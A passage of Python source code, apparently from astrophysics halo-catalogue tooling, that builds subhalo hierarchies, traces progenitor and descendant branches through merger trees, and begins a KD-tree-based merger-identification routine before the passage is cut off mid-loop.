Routines to build a hierarchy structure (both spatially and temporally)
"""
def BuildHierarchy(halodata,iverbose=0):
    """
    the halo data stored in a velociraptor .properties file should store the id of its parent halo. Here
    this catalog is used to produce a hierarchy to quickly access the relevant subhaloes of a parent halo.
    #todo this should be deprecated as Hierarchy information is typically already contained in halo information

    Parameters
    ----------
    halodata : dict
        Must contain "npart", "hostHaloID" and "ID" arrays.
    iverbose : int
        If nonzero, print timing information.

    Returns
    -------
    list
        One entry per halo: field haloes (hostHaloID == -1) get the
        np.where result selecting their direct subhaloes; subhaloes
        keep an empty list.
    """
    #time.time() replaces time.clock(), which was removed in Python 3.8
    start=time.time()
    if (iverbose): print("setting hierarchy")
    numhalos=len(halodata["npart"])
    #field haloes are those with no host
    haloindex=np.where(halodata["hostHaloID"]==-1)
    lenhal=len(haloindex[0])
    halohierarchy=[[] for k in range(numhalos)]
    if (iverbose): print("prelims done ",time.time()-start)
    for k in range(lenhal):
        halohierarchy[haloindex[0][k]]=np.where(halodata["hostHaloID"]==halodata["ID"][haloindex[0][k]])
    #NOTE: IMPORTANT this is only adding the subsub halos! I need to eventually parse the hierarchy
    #data first to deteremine the depth of the subhalo hierarchy and store how deep an object is in the hierarchy
    #then I can begin adding (sub)subhalos to parent subhalos from the bottom level up
    if (iverbose): print("hierarchy set in read in ",time.time()-start)
    return halohierarchy
def TraceMainProgen(istart,ihalo,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL):
    """
    Follows a halo along tree to identify main progenitor

    Starting at snapshot istart, walks halo ihalo's main branch, filling in
    place the Head/Tail (+snap) and RootHead/RootTail (+snap) entries of
    halodata, and copying Num_progen from the tree.

    NOTE(review): the index arithmetic assumes halo ids are of the form
    snap*TEMPORALHALOIDVAL + index + 1, i.e. catalogs are stored in id order
    within each snapshot -- confirm for the catalog in use.
    """
    #start at this snapshot
    k=istart
    #see if halo does not have a tail (descendant set).
    if (halodata[k]['Tail'][ihalo]==0):
        #if halo has not had a tail set the branch needs to be walked along the main branch
        haloid=halodata[k]['ID'][ihalo]
        #only set the head if it has not been set
        #otherwise it should have already been set and just need to store the root head
        if (halodata[k]['Head'][ihalo]==0):
            halodata[k]['Head'][ihalo]=haloid
            halodata[k]['HeadSnap'][ihalo]=k
            halodata[k]['RootHead'][ihalo]=haloid
            halodata[k]['RootHeadSnap'][ihalo]=k
            roothead,rootsnap,rootindex=haloid,k,ihalo
        else:
            roothead=halodata[k]['RootHead'][ihalo]
            rootsnap=halodata[k]['RootHeadSnap'][ihalo]
            rootindex=int(roothead%TEMPORALHALOIDVAL)-1
        #now move along tree first pass to store head and tails and root heads of main branch
        while (True):
            #instead of seraching array make use of the value of the id as it should be in id order
            #wdata=np.where(tree[k]['haloID']==haloid)
            #w2data=np.where(halodata[k]['ID']==haloid)[0][0]
            wdata=w2data=int(haloid%TEMPORALHALOIDVAL)-1
            halodata[k]['Num_progen'][wdata]=tree[k]['Num_progen'][wdata]
            #if no more progenitors, break from search
            #if (tree[k]['Num_progen'][wdata[0][0]]==0 or len(wdata[0])==0):
            if (tree[k]['Num_progen'][wdata]==0):
                #store for current halo its tail and root tail info (also store root tail for root head)
                halodata[k]['Tail'][w2data]=haloid
                halodata[k]['TailSnap'][w2data]=k
                halodata[k]['RootTail'][w2data]=haloid
                halodata[k]['RootTailSnap'][w2data]=k
                #only set the roots tail if it has not been set before (ie: along the main branch of root halo)
                #if it has been set then we are walking along a secondary branch of the root halo's tree
                if (halodata[rootsnap]['RootTail'][rootindex]==0):
                    halodata[rootsnap]['RootTail'][rootindex]=haloid
                    halodata[rootsnap]['RootTailSnap'][rootindex]=k
                break
            #store main progenitor
            #mainprog=tree[k]['Progen'][wdata[0][0]][0]
            mainprog=tree[k]['Progen'][wdata][0]
            #calculate stepsize based on the halo ids
            stepsize=int(((haloid-haloid%TEMPORALHALOIDVAL)-(mainprog-mainprog%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
            #store tail
            halodata[k]['Tail'][w2data]=mainprog
            halodata[k]['TailSnap'][w2data]=k+stepsize
            k+=stepsize
            #instead of searching array make use of the value of the id as it should be in id order
            #for progid in tree[k-stepsize]['Progen'][wdata[0][0]]:
            #    wdata3=np.where(halodata[k]['ID']==progid)[0][0]
            #every progenitor (not just the main one) gets this halo as its head
            for progid in tree[k-stepsize]['Progen'][wdata]:
                wdata3=int(progid%TEMPORALHALOIDVAL)-1
                halodata[k]['Head'][wdata3]=haloid
                halodata[k]['HeadSnap'][wdata3]=k-stepsize
                halodata[k]['RootHead'][wdata3]=roothead
                halodata[k]['RootHeadSnap'][wdata3]=rootsnap
            #then store next progenitor
            haloid=mainprog
def TraceMainProgenParallelChunk(istart,ihalochunk,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL):
    """
    Trace the main progenitor of every halo index in ihalochunk.

    Thin wrapper around TraceMainProgen so that a multiprocessing worker
    can process a whole chunk of haloes with a single call.
    """
    for haloidx in ihalochunk:
        TraceMainProgen(istart,haloidx,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL)
def BuildTemporalHeadTail(numsnaps,tree,numhalos,halodata,TEMPORALHALOIDVAL=1000000000000, iverbose=1):
    """
    Adds for each halo its Head and Tail and stores Roothead and RootTail to the halo
    properties file
    TEMPORALHALOIDVAL is used to parse the halo ids and determine the step size between descendant and progenitor

    Parameters
    ----------
    numsnaps : int
        number of snapshots
    tree : list of dict
        per-snapshot progenitor tree ('Num_progen', 'Progen')
    numhalos : array
        number of haloes per snapshot
    halodata : list of dict
        per-snapshot halo catalogs, extended in place with Head/Tail,
        RootHead/RootTail (+ snap) and Num_progen arrays
    iverbose : int
        verbosity level
    """
    print("Building Temporal catalog with head and tails")
    #allocate the temporal arrays filled below
    for k in range(numsnaps):
        halodata[k]['Head']=np.zeros(numhalos[k],dtype=np.int64)
        halodata[k]['Tail']=np.zeros(numhalos[k],dtype=np.int64)
        halodata[k]['HeadSnap']=np.zeros(numhalos[k],dtype=np.int32)
        halodata[k]['TailSnap']=np.zeros(numhalos[k],dtype=np.int32)
        halodata[k]['RootHead']=np.zeros(numhalos[k],dtype=np.int64)
        halodata[k]['RootTail']=np.zeros(numhalos[k],dtype=np.int64)
        halodata[k]['RootHeadSnap']=np.zeros(numhalos[k],dtype=np.int32)
        halodata[k]['RootTailSnap']=np.zeros(numhalos[k],dtype=np.int32)
        halodata[k]['Num_progen']=np.zeros(numhalos[k],dtype=np.uint32)
    #for each snapshot identify halos that have not had their tail set
    #for these halos, the main branch must be walked
    #allocate python manager to wrapper the tree and halo catalog so they can be altered in parallel
    manager=mp.Manager()
    chunksize=5000000 #have each thread handle this many halos at once
    #init to that at this point snapshots should be run in parallel
    if (numhalos[0]>2*chunksize): iparallel=1
    else: iparallel=-1 #no parallel at all
    #NOTE(review): parallel processing is currently force-disabled here
    iparallel=-1
    #time.time() replaces time.clock(), which was removed in Python 3.8
    totstart=time.time()
    if (iparallel==1):
        #need to copy halodata as this will be altered
        if (iverbose>0): print("copying halo")
        start=time.time()
        mphalodata=manager.list([manager.dict(halodata[k]) for k in range(numsnaps)])
        if (iverbose>0): print("done",time.time()-start)
    for istart in range(numsnaps):
        if (iverbose>0): print("Starting from halos at ",istart,"with",numhalos[istart])
        if (numhalos[istart]==0): continue
        #if the number of halos is large then run in parallel
        if (numhalos[istart]>2*chunksize and iparallel==1):
            #determine maximum number of threads
            nthreads=int(min(mp.cpu_count(),ceil(numhalos[istart]/float(chunksize))))
            nchunks=int(np.ceil(numhalos[istart]/float(chunksize)/float(nthreads)))
            if (iverbose>0): print("Using", nthreads,"threads to parse ",numhalos[istart]," halos in ",nchunks,"chunks, each of size", chunksize)
            #now for each chunk run a set of proceses
            for j in range(nchunks):
                start=time.time()
                offset=j*nthreads*chunksize
                #if last chunk then must adjust nthreads
                if (j==nchunks-1):
                    nthreads=int(ceil((numhalos[istart]-offset)/float(chunksize)))
                halochunk=[range(offset+k*chunksize,offset+(k+1)*chunksize) for k in range(nthreads)]
                #adjust last chunk
                if (j==nchunks-1):
                    halochunk[-1]=range(offset+(nthreads-1)*chunksize,numhalos[istart])
                #when calling a process pass not just a work queue but the pointers to where data should be stored
                processes=[mp.Process(target=TraceMainProgenParallelChunk,args=(istart,halochunk[k],numsnaps,numhalos,mphalodata,tree,TEMPORALHALOIDVAL)) for k in range(nthreads)]
                count=0
                for p in processes:
                    #fixed: previously also printed a stale loop variable k here
                    print(count+offset,min(halochunk[count]),max(halochunk[count]))
                    p.start()
                    count+=1
                for p in processes:
                    #join thread and see if still active
                    p.join()
                if (iverbose>1): print((offset+j*nthreads*chunksize)/float(numhalos[istart])," done in",time.time()-start)
        #otherwise just single
        else :
            #if first time entering non parallel section copy data back from parallel manager based structure to original data structure
            #as parallel structures have been updated
            if (iparallel==1):
                halodata=[dict(mphalodata[k]) for k in range(numsnaps)]
                #set the iparallel flag to 0 so that all subsequent snapshots (which should have fewer objects) not run in parallel
                #this is principly to minimize the amount of copying between manager based parallel structures and the halo/tree catalogs
                iparallel=0
            start=time.time()
            chunksize=max(int(0.10*numhalos[istart]),10)
            for j in range(numhalos[istart]):
                #walk the main branch of halo j starting at this snapshot
                TraceMainProgen(istart,j,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL)
                if (j%chunksize==0 and j>0):
                    if (iverbose>1): print("done", j/float(numhalos[istart]), "in", time.time()-start)
                    start=time.time()
    if (iverbose>0): print("done with first bit")
    #now have walked all the main branches and set the root head, head and tail values
    #and can set the root tail of all halos. Start at end of the tree and move in reverse setting the root tail
    #of a halo's head so long as that halo's tail is the current halo (main branch)
    for istart in range(numsnaps-1,-1,-1):
        for j in range(numhalos[istart]):
            #if a halo's root tail is itself then start moving up its along to its head (if its head is not itself as well
            k=istart
            roottailid,roottailsnap=halodata[k]['RootTail'][j],halodata[k]['RootTailSnap'][j]
            headid,headsnap=halodata[k]['Head'][j],halodata[k]['HeadSnap'][j]
            if (roottailid==halodata[k]['ID'][j] and headid!=halodata[k]['ID'][j]):
                #ids encode the index within a snapshot so no search is needed
                headindex=int(headid%TEMPORALHALOIDVAL)-1
                headtailid,headtailsnap=halodata[headsnap]['Tail'][headindex],halodata[headsnap]['TailSnap'][headindex]
                haloid=halodata[k]['ID'][j]
                #only proceed in setting root tails of a head who's tail is the same as halo (main branch) till we reach a halo who is its own head
                while (headtailid==haloid and headid!=haloid):
                    #set root tails
                    halodata[headsnap]['RootTail'][headindex]=roottailid
                    halodata[headsnap]['RootTailSnap'][headindex]=roottailsnap
                    #move to next head
                    haloid=halodata[headsnap]['ID'][headindex]
                    haloindex=int(haloid%TEMPORALHALOIDVAL)-1
                    halosnap=headsnap
                    headid,headsnap=halodata[halosnap]['Head'][haloindex],halodata[halosnap]['HeadSnap'][haloindex]
                    headindex=int(headid%TEMPORALHALOIDVAL)-1
                    #store the tail of the next head
                    headtailid,headtailsnap=halodata[headsnap]['Tail'][headindex],halodata[headsnap]['TailSnap'][headindex]
    print("Done building", time.time()-totstart)
def TraceMainDescendant(istart,ihalo,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL,ireverseorder=False):
    """
    Follows a halo along descendant tree to root tails
    if reverse order than late times start at 0 and as one moves up in index
    one moves backwards in time

    Walks halo ihalo's main descendant branch starting at snapshot istart,
    filling in place the Head/Tail (+snap), RootHead/RootTail (+snap),
    HeadRank, Num_descen and Num_progen entries of halodata.

    NOTE(review): assumes ids encode position as
    snap*TEMPORALHALOIDVAL + index + 1 -- confirm for the catalog in use.
    """
    #start at this snapshot
    halosnap=istart
    #see if halo does not have a Head set
    if (halodata[halosnap]['Head'][ihalo]==0):
        #if halo has not had a Head set the branch needs to be walked along the main branch
        haloid=halodata[halosnap]['ID'][ihalo]
        #only set the Root Tail if it has not been set. Here if halo has not had
        #tail set, then must be the the first progenitor
        #otherwise it should have already been set and just need to store the root tail
        if (halodata[halosnap]['Tail'][ihalo]==0):
            halodata[halosnap]['Tail'][ihalo]=haloid
            halodata[halosnap]['TailSnap'][ihalo]=halosnap
            halodata[halosnap]['RootTail'][ihalo]=haloid
            halodata[halosnap]['RootTailSnap'][ihalo]=halosnap
            roottail,rootsnap,rootindex=haloid,halosnap,ihalo
        else:
            roottail=halodata[halosnap]['RootTail'][ihalo]
            rootsnap=halodata[halosnap]['RootTailSnap'][ihalo]
            rootindex=int(roottail%TEMPORALHALOIDVAL)-1
        #now move along tree first pass to store head and tails and root tails of main branch
        while (True):
            #ids contain index information
            haloindex=int(haloid%TEMPORALHALOIDVAL)-1
            halodata[halosnap]['Num_descen'][haloindex]=tree[halosnap]['Num_descen'][haloindex]
            #if no more descendants, break from search
            if (halodata[halosnap]['Num_descen'][haloindex]==0):
                #store for current halo its tail and root tail info (also store root tail for root head)
                halodata[halosnap]['Head'][haloindex]=haloid
                halodata[halosnap]['HeadSnap'][haloindex]=halosnap
                halodata[halosnap]['RootHead'][haloindex]=haloid
                halodata[halosnap]['RootHeadSnap'][haloindex]=halosnap
                rootheadid,rootheadsnap,rootheadindex=haloid,halosnap,haloindex
                #only set the roots head of the root tail
                #if it has not been set before (ie: along the main branch of root halo)
                if (halodata[rootsnap]['RootHead'][rootindex]==0):
                    halosnap,haloindex,haloid=rootsnap,rootindex,roottail
                    #set the root head of the main branch
                    while(True):
                        halodata[halosnap]['RootHead'][haloindex]=rootheadid
                        halodata[halosnap]['RootHeadSnap'][haloindex]=rootheadsnap
                        descen=halodata[halosnap]['Head'][haloindex]
                        descenindex=int(descen%TEMPORALHALOIDVAL)-1
                        descensnap=int(((descen-descen%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
                        if (ireverseorder):
                            descensnap=numsnaps-1-descensnap
                        #stop once a halo is its own head (end of branch)
                        if (haloid==descen):
                            break
                        halosnap,haloindex,haloid=descensnap,descenindex,descen
                break
            #now store the rank of the of the descandant.
            descenrank=tree[halosnap]['Rank'][haloindex][0]
            halodata[halosnap]['HeadRank'][haloindex]=descenrank
            #as we are only moving along main branches stop if object is rank is not 0
            if (descenrank>0):
                break
            #otherwise, get the descendant
            #store main progenitor
            maindescen=tree[halosnap]['Descen'][haloindex][0]
            maindescenindex=int(maindescen%TEMPORALHALOIDVAL)-1
            maindescensnap=int(((maindescen-maindescen%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
            #if reverse order, then higher snap values correspond to lower index
            if (ireverseorder):
                maindescensnap=numsnaps-1-maindescensnap
            #calculate stepsize in time based on the halo ids
            stepsize=maindescensnap-halosnap
            #store descendant
            halodata[halosnap]['Head'][haloindex]=maindescen
            halodata[halosnap]['HeadSnap'][haloindex]=maindescensnap
            #and update the root tails of the object
            halodata[maindescensnap]['Tail'][maindescenindex]=haloid
            halodata[maindescensnap]['TailSnap'][maindescenindex]=halosnap
            halodata[maindescensnap]['RootTail'][maindescenindex]=roottail
            halodata[maindescensnap]['RootTailSnap'][maindescenindex]=rootsnap
            halodata[maindescensnap]['Num_progen'][maindescenindex]+=1
            #then move to the next descendant
            haloid=maindescen
            halosnap=maindescensnap
def TraceMainDescendantParallelChunk(istart,ihalochunk,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL,ireverseorder):
    """
    Trace the main descendant of every halo index in ihalochunk.

    Thin wrapper around TraceMainDescendant so that a multiprocessing
    worker can process a whole chunk of haloes with a single call.
    """
    for haloidx in ihalochunk:
        TraceMainDescendant(istart,haloidx,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL,ireverseorder)
def BuildTemporalHeadTailDescendant(numsnaps,tree,numhalos,halodata,TEMPORALHALOIDVAL=1000000000000, ireverseorder=False, iverbose=1):
    """
    Adds for each halo its Head and Tail and stores Roothead and RootTail to the halo
    properties file, using a descendant tree.
    TEMPORALHALOIDVAL is used to parse the halo ids and determine the step size between descendant and progenitor

    If ireverseorder is True, snapshot index 0 corresponds to the latest
    time and increasing index moves backwards in time.
    """
    print("Building Temporal catalog with head and tails using a descendant tree")
    #allocate the temporal arrays filled below
    for k in range(numsnaps):
        halodata[k]['Head']=np.zeros(numhalos[k],dtype=np.int64)
        halodata[k]['Tail']=np.zeros(numhalos[k],dtype=np.int64)
        halodata[k]['HeadSnap']=np.zeros(numhalos[k],dtype=np.int32)
        halodata[k]['TailSnap']=np.zeros(numhalos[k],dtype=np.int32)
        halodata[k]['RootHead']=np.zeros(numhalos[k],dtype=np.int64)
        halodata[k]['RootTail']=np.zeros(numhalos[k],dtype=np.int64)
        halodata[k]['RootHeadSnap']=np.zeros(numhalos[k],dtype=np.int32)
        halodata[k]['RootTailSnap']=np.zeros(numhalos[k],dtype=np.int32)
        halodata[k]['HeadRank']=np.zeros(numhalos[k],dtype=np.int64)
        halodata[k]['Num_descen']=np.zeros(numhalos[k],dtype=np.uint32)
        halodata[k]['Num_progen']=np.zeros(numhalos[k],dtype=np.uint32)
    #for each snapshot identify halos that have not had their tail set
    #for these halos, the main branch must be walked
    #allocate python manager to wrapper the tree and halo catalog so they can be altered in parallel
    manager=mp.Manager()
    chunksize=5000000 #have each thread handle this many halos at once
    #init to that at this point snapshots should be run in parallel
    if (numhalos[0]>2*chunksize): iparallel=1
    else: iparallel=-1 #no parallel at all
    #NOTE(review): parallel processing is currently force-disabled here
    iparallel=-1
    #time.time() replaces time.clock(), which was removed in Python 3.8
    totstart=time.time()
    if (ireverseorder):
        snaplist=range(numsnaps-1,-1,-1)
    else:
        snaplist=range(numsnaps)
    if (iparallel==1):
        #need to copy halodata as this will be altered
        if (iverbose>0): print("copying halo")
        start=time.time()
        mphalodata=manager.list([manager.dict(halodata[k]) for k in range(numsnaps)])
        if (iverbose>0): print("done",time.time()-start)
    for istart in snaplist:
        if (iverbose>0): print("Starting from halos at ",istart,"with",numhalos[istart])
        if (numhalos[istart]==0): continue
        #if the number of halos is large then run in parallel
        if (numhalos[istart]>2*chunksize and iparallel==1):
            #determine maximum number of threads
            nthreads=int(min(mp.cpu_count(),ceil(numhalos[istart]/float(chunksize))))
            nchunks=int(np.ceil(numhalos[istart]/float(chunksize)/float(nthreads)))
            if (iverbose>0): print("Using", nthreads,"threads to parse ",numhalos[istart]," halos in ",nchunks,"chunks, each of size", chunksize)
            #now for each chunk run a set of proceses
            for j in range(nchunks):
                start=time.time()
                offset=j*nthreads*chunksize
                #if last chunk then must adjust nthreads
                if (j==nchunks-1):
                    nthreads=int(ceil((numhalos[istart]-offset)/float(chunksize)))
                halochunk=[range(offset+k*chunksize,offset+(k+1)*chunksize) for k in range(nthreads)]
                #adjust last chunk
                if (j==nchunks-1):
                    halochunk[-1]=range(offset+(nthreads-1)*chunksize,numhalos[istart])
                #when calling a process pass not just a work queue but the pointers to where data should be stored
                processes=[mp.Process(target=TraceMainDescendantParallelChunk,args=(istart,halochunk[k],numsnaps,numhalos,mphalodata,tree,TEMPORALHALOIDVAL,ireverseorder)) for k in range(nthreads)]
                count=0
                for p in processes:
                    #fixed: previously also printed a stale loop variable k here
                    print(count+offset,min(halochunk[count]),max(halochunk[count]))
                    p.start()
                    count+=1
                for p in processes:
                    #join thread and see if still active
                    p.join()
                if (iverbose>1): print((offset+j*nthreads*chunksize)/float(numhalos[istart])," done in",time.time()-start)
        #otherwise just single
        else :
            #if first time entering non parallel section copy data back from parallel manager based structure to original data structure
            #as parallel structures have been updated
            if (iparallel==1):
                halodata=[dict(mphalodata[k]) for k in range(numsnaps)]
                #set the iparallel flag to 0 so that all subsequent snapshots (which should have fewer objects) not run in parallel
                #this is principly to minimize the amount of copying between manager based parallel structures and the halo/tree catalogs
                iparallel=0
            start=time.time()
            chunksize=max(int(0.10*numhalos[istart]),10)
            for j in range(numhalos[istart]):
                #walk the descendant branch of halo j starting at this snapshot
                TraceMainDescendant(istart,j,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL,ireverseorder)
                if (j%chunksize==0 and j>0):
                    if (iverbose>1): print("done", j/float(numhalos[istart]), "in", time.time()-start)
                    start=time.time()
    if (iverbose>0): print("done with first bit, setting the main branches walking forward in time")
    #now have walked all the main branches and set the root tail, head and tail values
    #in case halo data is with late times at beginning need to process items in reverse
    if (ireverseorder):
        snaplist=range(numsnaps)
    else:
        snaplist=range(numsnaps-1,-1,-1)
    for istart in snaplist:
        #identify all haloes which are not primary progenitors of their descendants, having a descendant rank >0
        wdata=np.where(halodata[istart]['HeadRank']>0)
        #sort this list based on descendant ranking
        sortedranking=np.argsort(halodata[istart]['HeadRank'][wdata])
        rankedhalos=halodata[istart]['ID'][wdata[0][sortedranking]]
        #for each of these haloes, set the head and use the root head information and root snap and set all the information
        #along its branch
        for ihalo in rankedhalos:
            haloid=ihalo
            haloindex=int(haloid%TEMPORALHALOIDVAL)-1
            halosnap=istart
            #now set the head of these objects
            maindescen=tree[halosnap]['Descen'][haloindex][0]
            maindescenindex=int(maindescen%TEMPORALHALOIDVAL)-1
            if (ireverseorder):
                maindescensnap=numsnaps-1-int((maindescen-maindescen%TEMPORALHALOIDVAL)/TEMPORALHALOIDVAL)
            else:
                maindescensnap=int((maindescen-maindescen%TEMPORALHALOIDVAL)/TEMPORALHALOIDVAL)
            #increase the number of progenitors of this descendant
            halodata[halosnap]['Head'][haloindex]=maindescen
            halodata[halosnap]['HeadSnap'][haloindex]=maindescensnap
            halodata[maindescensnap]['Num_progen'][maindescenindex]+=1
            #store the root head
            roothead=halodata[maindescensnap]['RootHead'][maindescenindex]
            rootsnap=halodata[maindescensnap]['RootHeadSnap'][maindescenindex]
            #now set the root head for all the progenitors of this object
            while (True):
                halodata[halosnap]['RootHead'][haloindex]=roothead
                halodata[halosnap]['RootHeadSnap'][haloindex]=rootsnap
                if (haloid==halodata[halosnap]['Tail'][haloindex]):
                    break
                haloid=halodata[halosnap]['Tail'][haloindex]
                halosnap=halodata[halosnap]['TailSnap'][haloindex]
                haloindex=int(haloid%TEMPORALHALOIDVAL)-1
    print("Done building", time.time()-totstart)
def GetProgenLength(halodata,haloindex,halosnap,haloid,atime,TEMPORALHALOIDVAL,endreftime=-1):
    """
    Count the number of snapshots along a halo's main branch.

    Walks the Tail pointers starting from (halosnap, haloindex) until a
    halo is its own progenitor, or the scale factor of the progenitor's
    snapshot drops to endreftime or below. The starting halo counts as 1.
    """
    length = 1
    while True:
        tailid = halodata[halosnap]["Tail"][haloindex]
        tailsnap = halodata[halosnap]["TailSnap"][haloindex]
        # a halo that is its own tail is the root of the branch
        if (tailid == haloid):
            break
        # stop once the branch extends past the reference time
        if (atime[tailsnap] <= endreftime):
            break
        length += 1
        haloid = tailid
        halosnap = tailsnap
        haloindex = int(tailid % TEMPORALHALOIDVAL - 1)
    return length
def IdentifyMergers(numsnaps,tree,numhalos,halodata,boxsize,hval,atime,MERGERMLIM=0.1,RADINFAC=1.2,RADOUTFAC=1.5,NPARTCUT=100, TEMPORALHALOIDVAL=1000000000000, iverbose=1,pos_tree=[]):
    """
    Using head/tail info in halodata dictionary identify mergers based on distance and mass ratios
    #todo still testing

    For every halo above NPARTCUT particles, walk its main branch backwards in
    time; at each progenitor search a KD tree for neighbours within
    RADINFAC*R_200crit whose mass ratio exceeds MERGERMLIM and that are moving
    towards the progenitor (negative radial velocity).  When such a merger is
    found, its start is traced further back until the pair separates beyond
    RADOUTFAC*R_200crit or the ratio falls below MERGERMLIM, and the merger is
    propagated forward along the descendant line.  Adds to each snapshot of
    halodata (in place): "LastMerger" (ID of the secondary), "LastMergerRatio",
    "LastMergerSnap" and "LastMergerDeltaSnap"; -1 marks "not set", 0 marks
    "no progenitor / no merger found".

    NOTE(review): pos_tree=[] is a mutable default argument — trees built here
    are retained across calls using the default; confirm this caching is intended.
    NOTE(review): time.clock() was removed in Python 3.8; this function as
    written requires an older interpreter.
    """
    for j in range(numsnaps):
        #store id and snap and mass of last major merger and while we're at it, store number of major mergers
        #-1 sentinels mean "no merger recorded yet"
        halodata[j]["LastMerger"]=np.ones(numhalos[j],dtype=np.int64)*-1
        halodata[j]["LastMergerRatio"]=np.ones(numhalos[j],dtype=np.float64)*-1
        halodata[j]["LastMergerSnap"]=np.zeros(numhalos[j],dtype=np.uint32)
        halodata[j]["LastMergerDeltaSnap"]=np.zeros(numhalos[j],dtype=np.uint32)
        #halodata[j]["NumMergers"]=np.zeros(numhalos[j],dtype=np.uint32)
    #built KD tree to quickly search for near neighbours
    if (len(pos_tree)==0):
        pos=[[]for j in range(numsnaps)]
        pos_tree=[[]for j in range(numsnaps)]
        start=time.clock()
        if (iverbose): print("tree build")
        for j in range(numsnaps):
            if (numhalos[j]>0):
                #periodic box size in physical units at this snapshot
                boxval=boxsize*atime[j]/hval
                pos[j]=np.transpose(np.asarray([halodata[j]["Xc"],halodata[j]["Yc"],halodata[j]["Zc"]]))
                pos_tree[j]=spatial.cKDTree(pos[j],boxsize=boxval)
        if (iverbose): print("done ",time.clock()-start)
    #else assume tree has been passed
    for j in range(numsnaps):
        if (numhalos[j]==0): continue
        #at snapshot look at all haloes that have not had a major merger set
        #note that only care about objects with certain number of particles
        partcutwdata=np.where(halodata[j]["npart"]>=NPARTCUT)
        mergercut=np.where(halodata[j]["LastMergerRatio"][partcutwdata]<0)
        hids=np.asarray(halodata[j]["ID"][partcutwdata][mergercut],dtype=np.uint64)
        start=time.clock()
        if (iverbose):print("Processing ", len(hids))
        if (len(hids)==0):continue
        for hidval in hids:
            #now for each object get the main progenitor
            haloid=np.uint64(hidval)
            #index within the snapshot is encoded in the low digits of the temporally unique ID
            haloindex=int(haloid%TEMPORALHALOIDVAL-1)
            halosnap=j
            originalhaloid=haloid
            progid=halodata[halosnap]["Tail"][haloindex]
            progsnap=halodata[halosnap]["TailSnap"][haloindex]
            progindex=int(progid%TEMPORALHALOIDVAL-1)
            numprog=tree[halosnap]["Num_progen"][haloindex]
            #if object has no progenitor set LastMergerRatio to 0 and LastMerger to 0
            if (numprog==0):
                halodata[halosnap]["LastMerger"][haloindex]=0
                halodata[halosnap]["LastMergerRatio"][haloindex]=0
                continue
            #print "starting halos ",j, hidval
            #halo has main branch which we can wander on
            #while object is not its own progenitor move along tree to see how many major mergers it had across its history
            while (True):
                #now for each progenitor, lets find any nearby objects within a given mass/vmax interval
                posval=[halodata[progsnap]["Xc"][progindex],halodata[progsnap]["Yc"][progindex],halodata[progsnap]["Zc"][progindex]]
                radval=RADINFAC*halodata[progsnap]["R_200crit"][progindex]
                #get neighbour list within RADINFAC sorted by mass with most massive first
                NNlist=pos_tree[progsnap].query_ball_point(posval, radval)
                NNlist=[NNlist[ij] for ij in np.argsort(halodata[progsnap]["Mass_tot"][NNlist])[::-1]]
                #store boxval for periodic correction
                boxval=boxsize*atime[progsnap]/hval
                #now if list contains some objects, lets see if the velocity vectors are moving towards each other and mass/vmax ratios are okay
                if (len(NNlist)>0):
                    for NN in NNlist:
                        if (NN!=progindex):
                            mratio=halodata[progsnap]["Mass_tot"][NN]/halodata[progsnap]["Mass_tot"][progindex]
                            #NOTE(review): vratio is computed but never used below — possibly leftover from a Vmax-based cut
                            vratio=halodata[progsnap]["Vmax"][NN]/halodata[progsnap]["Vmax"][progindex]
                            #merger ratio is for object being larger of the two involved in merger
                            if (mratio>MERGERMLIM and mratio<1.0):
                                posvalrel=[halodata[progsnap]["Xc"][progindex]-halodata[progsnap]["Xc"][NN],halodata[progsnap]["Yc"][progindex]-halodata[progsnap]["Yc"][NN],halodata[progsnap]["Zc"][progindex]-halodata[progsnap]["Zc"][NN]]
                                #minimum-image periodic correction of the separation vector
                                for ij in range(3):
                                    if posvalrel[ij]<-0.5*boxval: posvalrel[ij]+=boxval
                                    elif posvalrel[ij]>0.5*boxval: posvalrel[ij]-=boxval
                                velvalrel=[halodata[progsnap]["VXc"][progindex]-halodata[progsnap]["VXc"][NN],halodata[progsnap]["VYc"][progindex]-halodata[progsnap]["VYc"][NN],halodata[progsnap]["VZc"][progindex]-halodata[progsnap]["VZc"][NN]]
                                #radial component of relative velocity; negative means approaching
                                radvelval=np.dot(posvalrel,velvalrel)/np.linalg.norm(posvalrel)
                                if (radvelval<0):
                                    #merger is happending
                                    #print "merger happening ", progsnap, NN
                                    #question of whether should move down the tree till merger no longer happening and define that as the start
                                    #this could also set the length of the merger
                                    #walk back along both branches until the pair separates beyond RADOUTFAC*R_200crit
                                    #or the mass ratio falls below MERGERMLIM, defining the merger start point
                                    starthaloindex=progindex
                                    starthaloid=progid
                                    starthalosnap=progsnap
                                    startmergerindex=NN
                                    startmergerid=halodata[progsnap]["ID"][NN]
                                    startmergersnap=progsnap
                                    mergerstartindex=starthaloindex
                                    mergerstartid=starthaloid
                                    mergerstartsnap=starthalosnap
                                    while (tree[starthalosnap]["Num_progen"][starthaloindex]>0 and tree[startmergersnap]["Num_progen"][startmergerindex]>0):
                                        posvalrel=[halodata[starthalosnap]["Xc"][starthaloindex]-halodata[startmergersnap]["Xc"][startmergerindex],halodata[starthalosnap]["Yc"][starthaloindex]-halodata[startmergersnap]["Yc"][startmergerindex],halodata[starthalosnap]["Zc"][starthaloindex]-halodata[startmergersnap]["Zc"][startmergerindex]]
                                        boxval=boxsize*atime[starthalosnap]/hval
                                        for ij in range(3):
                                            if posvalrel[ij]<-0.5*boxval: posvalrel[ij]+=boxval
                                            elif posvalrel[ij]>0.5*boxval: posvalrel[ij]-=boxval
                                        radval=np.linalg.norm(posvalrel)/halodata[starthalosnap]["R_200crit"][starthaloindex]
                                        mratio=halodata[startmergersnap]["Mass_tot"][startmergerindex]/halodata[starthalosnap]["Mass_tot"][starthaloindex]
                                        #as moving back if halo now outside or too small, stop search and define this as start of merger
                                        if (radval>RADOUTFAC or mratio<MERGERMLIM):
                                            mergerstartindex=starthaloindex
                                            mergerstartid=starthaloid
                                            mergerstartsnap=starthalosnap
                                            break
                                        #move to next progenitors
